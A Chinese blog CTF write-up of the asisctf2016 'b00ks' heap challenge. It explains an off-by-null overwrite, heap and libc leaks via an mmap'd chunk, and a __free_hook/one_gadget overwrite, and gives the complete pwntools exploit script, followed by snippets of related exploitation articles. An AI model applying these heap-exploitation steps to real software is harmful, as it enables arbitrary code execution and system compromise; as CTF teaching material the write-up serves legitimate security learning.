off-by-null-b00ks

最新推荐文章于 2024-03-16 19:26:53 发布
最新推荐文章于 2024-03-16 19:26:53 发布
阅读量370 收藏
点赞数
分类专栏: pwn题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csdn546229768/article/details/122529451
版权

题目: asisctf2016_b00ks

保护

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HNoRgUrU-1642340360848)(off-by-null.assets/image-20220116195353489.png)]

除了canary全开,因为是堆题,所以基本可以认为保护措施全开

分析

主函数

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-flBDG3BV-1642340360849)(off-by-null.assets/image-20220116195613703.png)]

程序封装的read函数

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-8b36tYAM-1642340360850)(off-by-null.assets/image-20220116195723248.png)]

add函数

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-x9IphPf3-1642340360851)(off-by-null.assets/image-20220116195752315.png)]
在这里插入图片描述

由add函数可得出以下结构示意图:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Dfj8zsQx-1642340360852)(off-by-null.assets/image-20220116200808101.png)]

dele函数

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-djoyK1X4-1642340360852)(off-by-null.assets/image-20220116195857929.png)]

edit函数

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-r5dFWDGN-1642340360853)(off-by-null.assets/image-20220116195917126.png)]

show函数

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-7eENpDQ5-1642340360853)(off-by-null.assets/image-20220116195945893.png)]

init_name函数

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pn5MBWAC-1642340360854)(off-by-null.assets/image-20220116200003501.png)]
重命名的bss段
在这里插入图片描述

思路

  1. 因为有off-by-null漏洞且bss段中 name到ptr_array的距离刚好0x20大小 name:0x202040 ptr
  2. 填充’P’*0x20大小时会覆盖到ptr_array处最低字节为\x00
  3. 但是ptr[0]是下一步才写入的值,所以并不会改变该值的最低位为\x00
sla('Enter author name: ','P'*0x20)

#创建一个堆块 , 它的指针保存在0x202060

add(0x1d0,'AAAA',0x20,'BBBB') #这里chunk大小为构造下面只能覆盖\x00的要求,从而使它指向fake chunk地址

#此时打印时会连带输出0x202060的值,也就是堆的地址

  1 show()  
  2 ru('P'*0x20)
  3 chunk1 = uu64(rc(6))
  4 success('chunk1 addr',chunk1)

bss如图:

  1. 我们知道unsotbin + uaf 泄露libc是通过得到main_arean出的值从而获取libc的固定偏移
  2. 那么mmap()分配也是类似的原理,它分配的chunk在.tls段前,通过固定偏移也可泄露libc
add(0x21000,'CCCC',0x21000,'DDDD') #这里申请一个大于topchunk大小的chunk则会由mmap()分配
#且它不会放到堆空间处

泄露libc

  1 chunk2 = chunk1 + 0x30  #申请的第二个chunk地址
  2 fake = p64(1) + p64(0) + p64(chunk2+0x10)+ p64(0x20)  
'''p64(1) 是该chunk的索引 
   p64(0)作为占位使用
   p64(chunk2+0x10)是指向chunk2 的description_ptr
   p64(0x20) chunk2 的description_ptr的size
   fake chunk的结构这里结构必须完整,不然后面对fake chunk进行修改时,会导致程序崩溃'''
  3 edit(1,fake)
  4 name('P'*0x20) #重新覆盖ptr_array[0]的最低字节为\x00  通过前面的size构造这里就指向>
  5 show() #而p64(chunk2+8)指向的是mmap()分配处的地址 ,这样就形成了双级指针,从而打印出地址
  6 ru("Name: ")
  7 libc_base = uu64(rc(6)) - (0x7f7edfb43010-0x7f7edf59e000) #计算偏移差
  8 success('libc',libc_base)

那么我们来看看现在的堆结构:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xNmYLwnM-1642340360855)(off-by-null.assets/image-20220116191551493.png)]

那么现在修改chunk1的内容就等同于 修改chunk2的description_ptr指针

那么修改chunk2的内容就等同于 修改上面chunk2的description_ptr指针下的内容

这就形成了一个自定义指针关系,该程序保护措施限制了got表 , 那么可以使用 __free_hook + one_gadge

  1 free_hook = libc_base + libc.symbols['__free_hook']
  2 edit(1,p64(free_hook))
  3 edit(2,p64(libc_base + one[1]))
  4 dele(1) #getshell

完整exp:

# -*-coding:utf-8 -*
from pwn import *

context.log_level = 'debug'
context.arch = 'amd64'
SigreturnFrame(kernel = 'amd64')


binary = "./b00ks"

global p
local = 1
if local:
    p = process(binary)
    e = ELF(binary)
    libc = e.libc
else:
    p = remote("111.200.241.244","58782")
    e = ELF(binary)
    libc = e.libc
    #libc = ELF('./libc_32.so.6')

sd = lambda s:p.send(s)
sl = lambda s:p.sendline(s)
rc = lambda s:p.recv(s)
ru = lambda s:p.recvuntil(s)
sa = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)
uu32 = lambda data :u32(data.ljust(4, b'\0'))
uu64 = lambda data :u64(data.ljust(8, b'\0'))
u64Leakbase = lambda offset :u64(ru("\x7f")[-6: ] + b'\0\0') - offset
u32Leakbase = lambda offset :u32(ru("\xf7")[-4: ]) - offset
it = lambda :p.interactive()


def z(s='b main'):
 gdb.attach(p,s)

def success(string,addr):
    print('\033[1;31;40m%20s-->0x%x\033[0m'%(string,addr))

def pa(s='暂停!'):
  log.success('当前执行步骤 -> '+str(s))
  pause()
one = [0x45206,0x4525a,0xcc673,0xcc748,0xefa00,0xf0897,0xf5e40,0xef9f4] #2.23
#one = [0x45226,0x4527a,0xcd173,0xcd248,0xf03a4,0xf03b0,0xf1247,0xf67f0]

def add(a,b,c,d):
    sla('> ','1')
    sla('Enter book name size:',str(a))
    sla('Enter book name (Max 32 chars):',b)
    sla('Enter book description size:',str(c))
    sla('Enter book description:',d)
def dele(a):
    sla('> ','2')
    sla('Enter the book id you want to delete:',str(a))
def show():
    sla('> ','4')
def edit(a,b):
    sla('> ','3')
    sla('Enter the book id you want to edit:',str(a))
    sla('Enter new book description:',b)
def name(a):
    sla('> ','5')
    sla('name: ',a)


#------------leak heap_addr----------------
sla('Enter author name: ','P'*0x20)
#因为有off-by-null漏洞且bss段中 name到ptr_array的距离刚好0x20大小 name:0x202040 ptr_array:0x202060
#填充'P'*0x20大小时会覆盖到ptr_array处最低字节为\x00
#但是ptr[0]是下一步才写入的值,所以并不会改变该值的最低位为\x00
add(0x1d0,'AAAA',0x20,'BBBB') #创建一个堆块 , 它的指针保存在0x202060
show()  #此时打印时会连带输出0x202060的值,也就是堆的地址
ru('P'*0x20)
chunk1 = uu64(rc(6))
success('chunk1 addr',chunk1)
#------------leak libc----------------
#我们知道unsotbin + uaf 泄露libc是通过得到main_arean出的值从而获取libc的固定偏移
#那么mmap()分配也是类似的原理,它分配的chunk在.tls段前,通过固定偏移也可泄露libc
add(0x21000,'CCCC',0x21000,'DDDD')
#这里申请一个大于topchunk大小的chunk则会由mmap()分配
#且它不会放到堆空间处
chunk2 = chunk1 + 0x30  #申请的第二个chunk地址
fake = p64(1) + p64(0) + p64(chunk2+0x10)+ p64(0x20)  #p64(1) 是该chunk的索引
edit(1,fake)
name('P'*0x20) #重新覆盖ptr_array[0]的最低字节为\x00  通过前面的size构造这里就指向了p64(chunk2+8)
show() #而p64(chunk2+8)指向的是mmap()分配处的地址 ,这样就形成了双级指针,从而打印出了mmap()分配的指针地址
ru("Description: ")
libc_base = uu64(rc(6)) - (0x7f7edfb43010-0x7f7edf59e000)
success('libc',libc_base)
#------------attack into __free_hook----------------
#该程序保护措施限制了got表 , 那么可以使用 __free_hook + one_gadger进行getshell
free_hook = libc_base + libc.symbols['__free_hook']
edit(1,p64(free_hook))
edit(2,p64(libc_base + one[1]))
dele(1) #getshell
#------------end----------------
it()
HNHuangJingYu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
学习打卡2:off-by-null
一点涵的博客
09-08 845
督促自己:2020-9-8 学习笔记: 《逆向工程权威指南上》12: 指令集架构:x86指令集架构(ISA),opcode长度不同;ARM指令集架构(精简指令集RISC),opcode相同,机器码都封装在4个字节里面(ARM模式),或封装在2个字节里面(Thumb模式) x/86: 函数返回值在eax中 使用“栈”结构存储上述返回地址 ARM: 使用LR寄存器存储函数结束的返回地址 BX LR 指令的作用就是跳转到返回地址 MIPS: 寄存器命名方式有两种:数字命名($0 ~ 31)和伪名称命名(
Asis CTF 2016 b00ks(堆溢出NULL byte off-by-one)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-21 1442
Asis CTF 2016 b00ks1.题目获取2.查保护3.分析程序4.地址泄露泄露地址修改地址5.伪造结构体 1.题目获取 题目下载地址:点此下载 2.查保护 3.分析程序 IDA载入,查看main函数 这个函数读取一个名字,最长32个字节。 作者名被读到data段 sub_A89()打印程序功能,并获取用户输入的序号 sub_F55()的功能是添加书籍信息,在这个函数中可以分析到...
off by null 小结
qq_43409582的博客
11-20 3370
off by null 的一点心得 0x00 最近的一个比赛里有道off by null的题目,比较简单,这里写一下这题的wp和off by null的一些利用。 0x01 前置知识 off by null 本质上就是由于长度的检查不严谨导致了一个空字节的溢出造成的,通常我们会用它来构造Heap Overlap或是用来触发unlink。 这些的前提是对于堆块的合并有所了解。 向前合并与向后合并 先说向前合并,这里就不贴源码了。 通俗的说向前合并就是当一个chunk被free时去检查其物理相邻后一个chunk
[堆入门off-by-null]asis2016_b00ks
Nashi_Ko的博客
12-02 1351
[BUUCTF] asis2016_b00ks 堆入门off-by-null 刚开始学pwn就听说,堆的题目很魔幻,需要大量的基础知识。在漫长地啃堆基础原理以后,这是我第一次自己研究学习并且完全明白原理的堆题。特地在此做笔记记录。 0x00 逆向分析 一进来就很容易发现,这也是堆题中最为常见的菜单题目。 简单分析一下,打开程序,最先产生交互的函数是sub_B6D。 调用了sub_9F5函数,是作者自己写的read函数,再进去看看。 注意这里的判定:先++buf,然后判断是否达到了最大长度(32字符),
高版本libc_off_by_null(一看就懂)
qq_41683953的博客
03-16 1020
在libc2.29之后新增保护,区别与普通的off_by_null会判断pre_size和要合并的chunk_size是否相同普通的off_by_null只需要修改pre_inuse和pre_size即可完成重叠但是现在需要修改前一个的chunk_size这个显然不可能,那就只能自己伪造chunk。
Linux下堆漏洞利用(off-by-one)
nibiru_holmes的博客
03-14 8611
一个字节溢出被称为off-by-one,曾经的一段时间里,off-by-one被认为是不可以利用的,但是后来研究发现在堆上哪怕只有一个字节的溢出也会导致任意代码的执行。同时堆的off-by-one利用也出现在国内外的各类CTF竞赛中,但是在网络上还不能找到一篇系统的介绍堆off-by-one利用的教程。在这篇文章中我列出了5种常见的堆上的off-by-one攻击方式,并且给出了测试DEMO,测试的
pwn学习】堆溢出(四)- off-by-one 漏洞
Morphy_Amo的博客
02-16 1094
off-by-one 漏洞 前置学习 【pwn学习】堆溢出(一) 【pwn学习】堆溢出(二)- First Fit 【pwn学习】堆溢出(三)- Unlink和UAF off-by-one是一种特殊的溢出漏洞,指只溢出一个字节的情况。 造成原因 造成off-by-one的原因常常是因为边界验证不充分。 循环写入时,循环次数设置错误导致多写入了一个字节; 字符串操作有误; strlen 是我们很熟悉的计算 ascii 字符串长度的函数,这个函数在计算字符串长度时是不把结束符 '\x00' 计算
BUUCTF-PWN刷题记录-21
weixin_44145820的博客
05-15 680
目录wdb_2018_1st_babyheap(unlink, UAF) wdb_2018_1st_babyheap(unlink, UAF) add的大小固定为0x20 edit机会只有三次 指针悬挂 利用思路如下: 进行几次添加 add(0, (p64(0)+p64(0x31))*2) add(1, 'aaa\n') add(2, 'aaa\n') add(3, 'aaa\n') add(4, '/bin/sh\n') 删除0和1,再删除一次0,此时show(0)能泄露出heap的地址
pwn 堆入门之off by one
清霂的博客
04-18 239
目录Asis CTF 2016 b00ks Asis CTF 2016 b00ks #!/usr/bin/env python2 from pwn import * arch = "amd64" filename = "b00ks" context(os="linux", arch=arch, log_level="debug") content = 0 offset = 0 # elf elf = ELF(filename) menu_addr=0x0000000000000A89 free_got
2016-Asis-books_writeup
【xiaoxiaorenwu's blog】
04-07 418
wiki上的一道经典例题,写wp的目的一方面是wiki上一些细节讲的有点不太清楚,一方面是自己巩固一下做过的题目,看是否是真的掌握。 首先提供题目二级制文件链接:books 预览: 拿到题目先看基本信息: 可以看到题目是64位文件,所有保护全开,一般这种题目是堆题,且看到full relro则大概率是篡改malloc_hook。 然后运行一下,找到程序运行入口,然后放入ida里看反汇编码: 准...
【技术分享】实例剖析堆off_by_null漏洞
Innocence_0的博客
07-23 217
此时我们若在此处便写入shellcode,待后续我们劫持free_hook时,就可以无需写入libc中的system地址,而是直接填写shellcode的地址即可。(2)编辑刚刚所申请的0x30的chunk,将main_arena+88改为free_hook的地址,注意此处需要爆破半个字节。(5)控制tcache链上的fd指针,把main_arena+88的地址修改为free_hook的地址后,将其申请出来。chunk的大小是0x90,我就在此处申请一个0x30的chunk,以便对这片内存进行操作。
Asis CTF 2016 b00ks
Morphy_Amo的博客
02-22 3449
例题 Asis CTF 2016 b00ks ` 题目链接 1. 安全策略 [*] '/root/ctf/Other/pwn/heap/b00ks' Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled 开启了full RELRO,因此无法直接进行GOT表劫持。开启了PIE,也导致不能直接用
Unlink学习笔记(off-by-one null byte漏洞利用)
TaiJi1985的专栏
08-27 2699
看了很多malloc unlink 的案例,仍然是云里雾里, 找了一个案例,反复调了几十遍才弄明白其中原理。 off-by-one 漏洞 以及漏洞利用原理 off-by-one漏洞就是malloc 本来分配了0xf8的内存,结果可以写0xf9字节的数据,多写了一个,影响了下一个内存块的头部信息, 进而造成了被利用的可能。 unlink是双链表中删除一个节点的操作。 当前是p 前一个...
【八芒星计划】 OFF BY NULL
carol2358的博客
08-31 952
八芒星计划是我为了加深自己对于pwn各种题型的理解发起的,我会将平时遇到的题型相似的题目放在同一篇文章里,方便自己和他人查阅,同时也可能会录制相关的视频,来加深自己的映像,并且把知识点更细致地讲述给大家。 这一篇全部记录off by null 文章目录2019-BALSN-CTF-plaintext 2019-BALSN-CTF-plaintext 【2.29的off by null,借助large bin的会留下指向自己的指针的特性,来伪造fake chunk,达成off by null】 本题进行
Linux (x86) Exploit 开发系列教程之十一 Off-By-One 漏洞(基于堆)
热门推荐
龙哥盟
05-03 3万+
Off-By-One 漏洞(基于堆) 译者:飞龙 原文:Off-By-One Vulnerability (Heap Based) 预备条件: Off-By-One 漏洞(基于栈) 理解 glibc malloc VM 配置:Fedora 20(x86) 什么是 Off-By-One 漏洞? 在这篇文章中提到过,将源字符串复制到目标缓冲区可能造成 Off-By-One 漏洞,当源字
2021 ciscn 线上 pwn lonelywolf
yongbaoii的博客
08-30 238
显然是全开。 add 只能控制一个chunk,size也有限制。 edit 以回车结束。 这里有一个off by null。 show 就输出。 free 有个uaf。 整个看下来,那个index就是那种逗你玩那种。 然后libc当时给的是2.27,但是做半天发现是最新的2.27……里面更新了对那些tcache链表的那些检查,就挺离谱的,所以可以当成2.29来做。 那想想怎么来利用那个uaf。 uaf,在得到libc的条件下,我们可以直接攻击free_hook,来getshell。 但问题就是怎么来得到.
攻防世界PWN之Babyheap(null off by one)题解
seaaseesa的博客
11-20 2157
Babyheap(null off by one) 本题用到的知识 malloc_hook、realloc_hook、fastbin attack、unsorted bin合并 首先,检查一下程序的保护机制,保护全开 然后用IDA分析,发现在创建并读入数据时,有一个null off by one漏洞 我们所能利用的也就是这个漏洞 第一步仍然是想办法泄露一些关键地址 由于可以溢...
2024-2030全球与中国硅胶婴儿用品市场现状及未来发展趋势 Sample-Li Jinpan.pdf
最新发布
09-05
QYResearch是全球知名的大型咨询公司,行业涵盖各高科技行业产业链细分市场,横跨如半导体产业链(半导体设备及零部件、半导体材料、集成电路、制造、封测、分立器件、传感器、光电器件)、光伏产业链(设备、硅料/硅片、电池片、组件、辅料支架、逆变器、电站终端)、新能源汽车产业链(动力电池及材料、电驱电控、汽车半导体/电子、整车、充电桩)、通信产业链(通信系统设备、终端设备、电子元器件、射频前端、光模块、4G/5G/6G、宽带、IoT、数字经济、AI)、先进材料产业链(金属材料、高分子材料、陶瓷材料、纳米材料等)、机械制造产业链(数控机床、工程机械、电气机械、3C自动化、工业机器人、激光、工控、无人机)、食品药品、医疗器械、农业等。
用于非线性模型预测控制 (NMPC) 的并行优化工具包.7z
09-05
用于非线性模型预测控制 (NMPC) 的并行优化工具包.7z
U-B00T移植教程:Norflash到Nandflash逐步详解
本文档详细记录了U-BOOT移植的过程,分为三个阶段:从Norflash启动的U-BOOT、支持Nandflash驱动的U-BOOT以及最终能够从Nandflash启动的U-BOOT。作者以SMDK2410开发板为例,一步步引导读者理解和执行移植。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值